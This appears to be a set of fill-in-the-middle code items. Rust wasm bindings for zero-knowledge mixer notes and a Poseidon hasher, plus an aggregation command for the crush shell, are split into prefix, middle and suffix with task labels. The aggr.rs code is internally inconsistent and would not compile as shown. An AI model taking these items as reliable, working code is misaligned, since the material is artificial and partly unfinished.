#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn
|
(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bindgen
|
with_options
|
identifier_name
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
impl fmt::Display for NoteVersion {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(&note_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(&note_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self
|
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bind
|
{
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
|
identifier_body
|
lib.rs
|
{
#[wasm_bindgen(skip)]
pub prefix: String,
pub version: NoteVersion,
#[wasm_bindgen(skip)]
pub token_symbol: String,
pub group_id: u32,
pub block_number: Option<u32>,
#[wasm_bindgen(skip)]
pub r: Scalar,
#[wasm_bindgen(skip)]
pub nullifier: Scalar,
}
#[wasm_bindgen]
pub struct ZkProof {
#[wasm_bindgen(skip)]
pub comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub nullifier_hash: Scalar,
#[wasm_bindgen(skip)]
pub proof: Vec<u8>,
#[wasm_bindgen(skip)]
pub leaf_index_comms: Vec<CompressedRistretto>,
#[wasm_bindgen(skip)]
pub proof_comms: Vec<CompressedRistretto>,
}
|
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
match self {
NoteVersion::V1 => write!(f, "v1"),
}
}
}
impl FromStr for NoteVersion {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
match s {
"v1" => Ok(NoteVersion::V1),
_ => Err(OpStatusCode::InvalidNoteVersion),
}
}
}
impl fmt::Display for Note {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
let encoded_r = hex::encode(&self.r.to_bytes());
let encoded_nullifier = hex::encode(&self.nullifier.to_bytes());
let mut parts = vec![
self.prefix.clone(),
self.version.to_string(),
self.token_symbol.clone(),
format!("{}", self.group_id),
];
if let Some(bn) = self.block_number {
parts.push(format!("{}", bn));
}
parts.push(format!("{}{}", encoded_r, encoded_nullifier));
let note = parts.join("-");
write!(f, "{}", note)
}
}
impl FromStr for Note {
type Err = OpStatusCode;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let parts: Vec<&str> = s.split('-').collect();
let partial = parts.len() == 5;
let full = parts.len() == 6;
if !partial && !full {
return Err(OpStatusCode::InvalidNoteLength);
}
if parts[0] != NOTE_PREFIX {
return Err(OpStatusCode::InvalidNotePrefix);
}
let version: NoteVersion = parts[1].parse()?;
let token_symbol = parts[2].to_owned();
let group_id = parts[3].parse().map_err(|_| OpStatusCode::InvalidNoteId)?;
let (block_number, note_val) = match partial {
true => (None, parts[4]),
false => {
let bn = parts[4].parse().map_err(|_| OpStatusCode::InvalidNoteBlockNumber)?;
(Some(bn), parts[5])
}
};
if note_val.len() != 128 {
return Err(OpStatusCode::InvalidNoteSecrets);
}
let r = hex::decode(&note_val[..64])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
let nullifier = hex::decode(&note_val[64..])
.map(|v| v.try_into())
.map(|r| r.map(Scalar::from_bytes_mod_order))
.map_err(|_| OpStatusCode::InvalidHexLength)?
.map_err(|_| OpStatusCode::HexParsingFailed)?;
Ok(Note {
prefix: NOTE_PREFIX.to_owned(),
version,
token_symbol,
group_id,
block_number,
r,
nullifier,
})
}
}
#[wasm_bindgen]
impl Note {
pub fn deserialize(value: JsString) -> Result<Note, JsValue> {
let note: String = value.into();
note.parse().map_err(Into::into)
}
pub fn serialize(&self) -> JsString {
let note = self.to_string();
note.into()
}
#[wasm_bindgen(getter)]
pub fn token_symbol(&self) -> JsString {
self.token_symbol.clone().into()
}
}
#[wasm_bindgen]
impl ZkProof {
#[wasm_bindgen(getter)]
pub fn proof(&self) -> Uint8Array {
Uint8Array::from(self.proof.as_slice())
}
#[wasm_bindgen(getter)]
pub fn comms(&self) -> Commitments {
let list: Array = self
.comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn leaf_index_comms(&self) -> Commitments {
let list: Array = self
.leaf_index_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn proof_comms(&self) -> Commitments {
let list: Array = self
.proof_comms
.clone()
.into_iter()
.map(|v| Uint8Array::from(v.as_bytes().to_vec().as_slice()))
.collect();
let js = JsValue::from(list);
Commitments::from(js)
}
#[wasm_bindgen(getter)]
pub fn nullifier_hash(&self) -> Uint8Array {
ScalarWrapper(self.nullifier_hash).into()
}
}
#[wasm_bindgen]
pub struct PoseidonHasherOptions {
/// The size of the permutation, in field elements.
width: usize,
/// Number of full SBox rounds in beginning
pub full_rounds_beginning: Option<usize>,
/// Number of full SBox rounds in end
pub full_rounds_end: Option<usize>,
/// Number of partial rounds
pub partial_rounds: Option<usize>,
/// The desired (classical) security level, in bits.
pub security_bits: Option<usize>,
/// Bulletproof generators for proving/verifying (serialized)
#[wasm_bindgen(skip)]
pub bp_gens: Option<BulletproofGens>,
}
impl Default for PoseidonHasherOptions {
fn default() -> Self {
Self {
width: 6,
full_rounds_beginning: None,
full_rounds_end: None,
partial_rounds: None,
security_bits: None,
bp_gens: None,
}
}
}
#[wasm_bindgen]
impl PoseidonHasherOptions {
#[wasm_bindgen(constructor)]
pub fn new() -> Self {
Self::default()
}
#[wasm_bindgen(setter)]
pub fn set_bp_gens(&mut self, value: Uint8Array) {
let bp_gens =
bincode::deserialize(&value.to_vec()).unwrap_or_else(|_| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
self.bp_gens = Some(bp_gens);
}
#[wasm_bindgen(getter)]
pub fn bp_gens(&self) -> Uint8Array {
let val = self
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let serialized = bincode::serialize(&val).unwrap_or_else(|_| Vec::new());
Uint8Array::from(serialized.as_slice())
}
}
#[wasm_bindgen]
#[derive(Clone)]
pub struct PoseidonHasher {
inner: Poseidon,
}
#[wasm_bindgen]
impl PoseidonHasher {
pub fn default() -> Self {
Self::with_options(Default::default())
}
#[wasm_bindgen(constructor)]
pub fn with_options(opts: PoseidonHasherOptions) -> Self {
let pc_gens = PedersenGens::default();
let bp_gens = opts
.bp_gens
.clone()
.unwrap_or_else(|| BulletproofGens::new(BULLETPROOF_GENS_SIZE, 1));
let inner = PoseidonBuilder::new(opts.width)
.sbox(PoseidonSbox::Exponentiation3)
.bulletproof_gens(bp_gens)
.pedersen_gens(pc_gens)
.build();
Self { inner }
}
pub fn hash(&self, left: Uint8Array, right: Uint8Array) -> Result<Uint8Array, JsValue> {
let xl = ScalarWrapper::try_from(left)?;
let xr = ScalarWrapper::try_from(right)?;
let hash = Poseidon_hash_2(*xl, *xr, &self.inner);
Ok(ScalarWrapper(hash).into())
}
}
#[wasm_bindgen
|
impl fmt::Display for NoteVersion {
|
random_line_split
|
aggr.rs
|
, argument_error, mandate, error};
use crate::lib::command_util::{find_field, find_field_from_str};
use crate::lang::printer::Printer;
use crossbeam::{Receiver, bounded, unbounded, Sender};
use crate::util::thread::{handle, build};
struct Aggregation {
idx: usize,
name: String,
command: Closure,
}
pub struct Config {
table_idx: usize,
aggregations: Vec<Aggregation>,
}
pub fn parse(input_type: &[ColumnType], argument: Vec<Argument>) -> CrushResult<Config> {
let mut table=None;
let mut aggregations = Vec::new();
let mut next_idx = input_type.len();
for a in &argument {
match (a.name.as_deref(), a.value) {
(Some("column"), Value::Field(name)) => {
table = Some(find_field(name.as_ref(), input_type)?);
}
(Some(name), Value::Closure(command)) => {
aggregations.push(
Aggregation {
command,
name: Box::from(name),
idx: find_field_from_str(name, input_type)
.unwrap_or_else(|| {next_idx += 1; next_idx - 1})
}
)
}
_ => return argument_error("Bad argument"),
}
}
Ok(Config {
table_idx: mandate(table, "Missing table spec")?,
aggregations,
})
/*
if argument.len() < 2 {
return Err(argument_error("Expected at least two parameters"));
}
let (table_idx, aggregations) = match (argument.len() % 2, argument[0].name.is_none(), &argument[0].value) {
(0, false, _) => (guess_table(input_type)?, &argument[..]),
(1, true, Value::Field(f)) => (find_field(&f, input_type)?, &argument[1..]),
_ => return Err(argument_error("Could not find table to aggregate")),
};
match &input_type[table_idx].cell_type {
ValueType::Rows(sub_type) |
ValueType::Output(sub_type) => {
let output_definition = aggregations
.chunks(2)
.into_iter()
.map(|args| {
let spec = &args[0];
let clos = &args[1];
match (&spec.name, &spec.value, &clos.value) {
(Some(name), Value::Field(f), Value::Closure(c)) =>
Ok((
name.to_string(),
find_field(&f, sub_type)?,
c.clone()
)),
_ => Err(error("Invalid aggregation spec")),
}
})
.collect::<JobResult<Vec<(String, usize, Closure)>>>()?;
Ok(Config {
table_idx,
output_definition,
})
}
_ => {
Err(argument_error("No table to aggregate on found"))
}
}
*/
}
/*
pub fn guess_table(input_type: &[ColumnType]) -> JobResult<usize> {
let tables: Vec<usize> = input_type
.iter()
.enumerate()
.flat_map(|(idx, t)| {
match &t.cell_type {
ValueType::Output(_) | ValueType::Rows(_) => Some(idx),
_ => None,
}
}).collect();
if tables.len() == 1 {
Ok(tables[0])
} else {
Err(argument_error(format!("Could not guess tables to join, expected one table, found {}", tables.len()).as_str()))
}
}
*/
fn create_writer(
uninitialized_output: ValueSender,
mut output_names: Vec<Option<String>>,
writer_input: Receiver<Row>) ->
JobJoinHandle {
handle(build("aggr-writer".to_string()).spawn(
move || {
let output = match writer_input.recv() {
Ok(row) => {
let tmp = uninitialized_output.initialize(
row.cells
.iter()
.enumerate()
.map(|(idx, cell)| ColumnType { name: output_names[idx].take(), cell_type: cell.value_type() })
.collect()
)?;
tmp.send(row);
tmp
}
Err(_) => return Err(error("No output")),
};
loop {
match writer_input.recv() {
Ok(row) => {
output.send(row);
}
Err(_) => break,
}
}
Ok(())
}))
}
pub fn create_collector(
rest_input: InputStream,
uninitialized_inputs: Vec<ValueReceiver>,
writer_output: Sender<Row>) -> JobJoinHandle {
handle(build("aggr-collector".to_string()).spawn(
move || {
match rest_input.recv() {
Ok(mut partial_row) => {
for ui in uninitialized_inputs {
let i = ui.initialize_stream()?;
match i.recv() {
Ok(mut r) => {
partial_row.cells.push(std::mem::replace(&mut r.cells[0], Value::Integer(0)));
}
Err(_) => return Err(error("Missing value")),
}
}
writer_output.send(partial_row);
}
Err(_) => {}
}
Ok(())
}))
}
pub fn pump_table(
job_output: &mut impl Readable,
outputs: Vec<OutputStream>,
output_definition: &Vec<(String, usize, Closure)>) -> JobResult<()> {
let stream_to_column_mapping = output_definition.iter().map(|(_, off, _)| *off).collect::<Vec<usize>>();
loop {
match job_output.read() {
Ok(mut inner_row) => {
for stream_idx in 0..stream_to_column_mapping.len() {
outputs[stream_idx].send(Row { cells: vec![inner_row.cells.replace(stream_to_column_mapping[stream_idx], Value::Integer(0))] })?;
}
}
Err(_) => break,
}
}
Ok(())
}
fn create_aggregator(
name: &str,
idx: usize,
c: &Closure,
input_type: &[ColumnType],
uninitialized_inputs: &mut Vec<ValueReceiver>,
outputs: &mut Vec<OutputStream>,
env: &Env,
printer: &Printer) -> JobResult<JobJoinHandle> {
let (first_output, first_input) = streams(vec![
ColumnType::named(name, input_type[idx].value_type.clone())
]);
let (last_output, last_input) = streams();
outputs.push(first_output);
uninitialized_inputs.push(last_input);
let local_printer = printer.clone();
let local_env = env.clone();
let cc = c.clone();
Ok(handle(build("aggr-aggregator".to_string()).spawn(
move || {
cc.spawn_and_execute(CompileContext {
input: first_input,
output: last_output,
arguments: vec![],
env: local_env,
printer: local_printer,
});
Ok(())
})))
}
fn handle_row(
row: Row,
config: &Config,
job_output: &mut impl Readable,
printer: &Printer,
env: &Env,
input: &InputStream,
writer_output: &Sender<Row>) -> JobResult<()> {
let mut outputs: Vec<OutputStream> = Vec::new();
let mut uninitialized_inputs: Vec<ValueReceiver> = Vec::new();
let mut aggregator_handles: Vec<JobJoinHandle> = Vec::new();
let (uninit_rest_output, uninit_rest_input) = streams();
let mut rest_output_type = input.get_type().clone();
rest_output_type.remove(config.table_idx);
let rest_output = uninit_rest_output.initialize(rest_output_type)?;
let rest_input = uninit_rest_input.initialize()?;
for (name, idx, c) in config.output_definition.iter() {
aggregator_handles.push(create_aggregator(
name.as_str(),
*idx,
c,
job_output.get_type(),
&mut uninitialized_inputs,
&mut outputs,
env,
printer)?);
}
let collector_handle = create_collector(
rest_input,
uninitialized_inputs,
writer_output.clone());
rest_output.send(row)?;
drop(rest_output);
pump_table(job_output, outputs, &config.output_definition)?;
for h in aggregator_handles {
h.join(printer);
}
collector_handle.join(printer);
Ok(())
}
pub fn
|
(config: Config, printer: &Printer, env: &Env, mut input: impl Readable, uninitialized_output: ValueSender) -> JobResult<()> {
let (writer_output, writer_input) = bounded::<Row>(16);
let mut output_names = input.get_type().iter().map(|t| t.name.clone()).collect::<Vec<Option<String>>>();
output_names.remove(config.table_idx);
for (name, _, _) in &config.output_definition {
output_names.push(Some(name.clone()));
}
let writer_handle = create_writer(uninitialized_output, output_names, writer_input);
loop {
match input.recv() {
Ok(mut row) => {
let table_cell = row.cells.remove(config.table_idx);
match table_cell {
Value::Output(mut job_output) =>
handle_row(row, &config, &mut job_output.stream, printer, env, &input, &writer_output)?,
Value::Rows(mut rows) =>
handle_row(row, &config, &mut RowsReader::new(rows), printer, env, &input, &writer_output)?,
_ => {
printer.job_error(error("Wrong column type"));
break;
}
}
}
Err(_) => { break; }
}
}
drop(writer_output);
writer_handle.join(printer);
Ok(())
}
fn perform_on(arguments:
|
run
|
identifier_name
|
aggr.rs
|
, argument_error, mandate, error};
use crate::lib::command_util::{find_field, find_field_from_str};
use crate::lang::printer::Printer;
use crossbeam::{Receiver, bounded, unbounded, Sender};
use crate::util::thread::{handle, build};
struct Aggregation {
idx: usize,
name: String,
command: Closure,
}
pub struct Config {
table_idx: usize,
aggregations: Vec<Aggregation>,
}
pub fn parse(input_type: &[ColumnType], argument: Vec<Argument>) -> CrushResult<Config> {
let mut table=None;
let mut aggregations = Vec::new();
let mut next_idx = input_type.len();
for a in &argument {
match (a.name.as_deref(), a.value) {
(Some("column"), Value::Field(name)) => {
table = Some(find_field(name.as_ref(), input_type)?);
}
(Some(name), Value::Closure(command)) => {
aggregations.push(
Aggregation {
command,
name: Box::from(name),
idx: find_field_from_str(name, input_type)
.unwrap_or_else(|| {next_idx += 1; next_idx - 1})
}
)
}
_ => return argument_error("Bad argument"),
}
}
Ok(Config {
table_idx: mandate(table, "Missing table spec")?,
aggregations,
})
/*
if argument.len() < 2 {
return Err(argument_error("Expected at least two parameters"));
}
let (table_idx, aggregations) = match (argument.len() % 2, argument[0].name.is_none(), &argument[0].value) {
(0, false, _) => (guess_table(input_type)?, &argument[..]),
(1, true, Value::Field(f)) => (find_field(&f, input_type)?, &argument[1..]),
_ => return Err(argument_error("Could not find table to aggregate")),
};
match &input_type[table_idx].cell_type {
ValueType::Rows(sub_type) |
ValueType::Output(sub_type) => {
let output_definition = aggregations
.chunks(2)
.into_iter()
.map(|args| {
let spec = &args[0];
let clos = &args[1];
match (&spec.name, &spec.value, &clos.value) {
(Some(name), Value::Field(f), Value::Closure(c)) =>
Ok((
name.to_string(),
find_field(&f, sub_type)?,
c.clone()
)),
_ => Err(error("Invalid aggregation spec")),
}
})
.collect::<JobResult<Vec<(String, usize, Closure)>>>()?;
Ok(Config {
table_idx,
output_definition,
})
}
_ => {
Err(argument_error("No table to aggregate on found"))
}
}
*/
}
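// (added summary) Argument forms accepted by parse above: `column=<field>` selects
// the table column to aggregate over; any other named closure argument (for example
// `total={...}`) defines one aggregation whose output column takes the argument's name.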
/*
pub fn guess_table(input_type: &[ColumnType]) -> JobResult<usize> {
let tables: Vec<usize> = input_type
.iter()
.enumerate()
.flat_map(|(idx, t)| {
match &t.cell_type {
ValueType::Output(_) | ValueType::Rows(_) => Some(idx),
_ => None,
}
}).collect();
if tables.len() == 1 {
Ok(tables[0])
} else {
Err(argument_error(format!("Could not guess tables to join, expected one table, found {}", tables.len()).as_str()))
}
}
*/
fn create_writer(
uninitialized_output: ValueSender,
mut output_names: Vec<Option<String>>,
writer_input: Receiver<Row>) ->
JobJoinHandle {
handle(build("aggr-writer".to_string()).spawn(
move || {
let output = match writer_input.recv() {
Ok(row) => {
let tmp = uninitialized_output.initialize(
row.cells
.iter()
.enumerate()
.map(|(idx, cell)| ColumnType { name: output_names[idx].take(), cell_type: cell.value_type() })
.collect()
)?;
tmp.send(row);
tmp
}
Err(_) => return Err(error("No output")),
};
loop {
match writer_input.recv() {
Ok(row) => {
output.send(row);
}
Err(_) => break,
}
}
Ok(())
}))
}
pub fn create_collector(
rest_input: InputStream,
uninitialized_inputs: Vec<ValueReceiver>,
writer_output: Sender<Row>) -> JobJoinHandle {
handle(build("aggr-collector".to_string()).spawn(
move || {
match rest_input.recv() {
Ok(mut partial_row) => {
for ui in uninitialized_inputs {
let i = ui.initialize_stream()?;
match i.recv() {
Ok(mut r) => {
partial_row.cells.push(std::mem::replace(&mut r.cells[0], Value::Integer(0)));
}
Err(_) => return Err(error("Missing value")),
}
}
writer_output.send(partial_row);
}
Err(_) => {}
}
|
}))
}
pub fn pump_table(
job_output: &mut impl Readable,
outputs: Vec<OutputStream>,
output_definition: &Vec<(String, usize, Closure)>) -> JobResult<()> {
let stream_to_column_mapping = output_definition.iter().map(|(_, off, _)| *off).collect::<Vec<usize>>();
loop {
match job_output.read() {
Ok(mut inner_row) => {
for stream_idx in 0..stream_to_column_mapping.len() {
outputs[stream_idx].send(Row { cells: vec![inner_row.cells.replace(stream_to_column_mapping[stream_idx], Value::Integer(0))] })?;
}
}
Err(_) => break,
}
}
Ok(())
}
fn create_aggregator(
name: &str,
idx: usize,
c: &Closure,
input_type: &[ColumnType],
uninitialized_inputs: &mut Vec<ValueReceiver>,
outputs: &mut Vec<OutputStream>,
env: &Env,
printer: &Printer) -> JobResult<JobJoinHandle> {
let (first_output, first_input) = streams(vec![
ColumnType::named(name, input_type[idx].value_type.clone())
]);
let (last_output, last_input) = streams();
outputs.push(first_output);
uninitialized_inputs.push(last_input);
let local_printer = printer.clone();
let local_env = env.clone();
let cc = c.clone();
Ok(handle(build("aggr-aggregator".to_string()).spawn(
move || {
cc.spawn_and_execute(CompileContext {
input: first_input,
output: last_output,
arguments: vec![],
env: local_env,
printer: local_printer,
});
Ok(())
})))
}
fn handle_row(
row: Row,
config: &Config,
job_output: &mut impl Readable,
printer: &Printer,
env: &Env,
input: &InputStream,
writer_output: &Sender<Row>) -> JobResult<()> {
let mut outputs: Vec<OutputStream> = Vec::new();
let mut uninitialized_inputs: Vec<ValueReceiver> = Vec::new();
let mut aggregator_handles: Vec<JobJoinHandle> = Vec::new();
let (uninit_rest_output, uninit_rest_input) = streams();
let mut rest_output_type = input.get_type().clone();
rest_output_type.remove(config.table_idx);
let rest_output = uninit_rest_output.initialize(rest_output_type)?;
let rest_input = uninit_rest_input.initialize()?;
for (name, idx, c) in config.output_definition.iter() {
aggregator_handles.push(create_aggregator(
name.as_str(),
*idx,
c,
job_output.get_type(),
&mut uninitialized_inputs,
&mut outputs,
env,
printer)?);
}
let collector_handle = create_collector(
rest_input,
uninitialized_inputs,
writer_output.clone());
rest_output.send(row)?;
drop(rest_output);
pump_table(job_output, outputs, &config.output_definition)?;
for h in aggregator_handles {
h.join(printer);
}
collector_handle.join(printer);
Ok(())
}
pub fn run(config: Config, printer: &Printer, env: &Env, mut input: impl Readable, uninitialized_output: ValueSender) -> JobResult<()> {
let (writer_output, writer_input) = bounded::<Row>(16);
let mut output_names = input.get_type().iter().map(|t| t.name.clone()).collect::<Vec<Option<String>>>();
output_names.remove(config.table_idx);
for (name, _, _) in &config.output_definition {
output_names.push(Some(name.clone()));
}
let writer_handle = create_writer(uninitialized_output, output_names, writer_input);
loop {
match input.recv() {
Ok(mut row) => {
let table_cell = row.cells.remove(config.table_idx);
match table_cell {
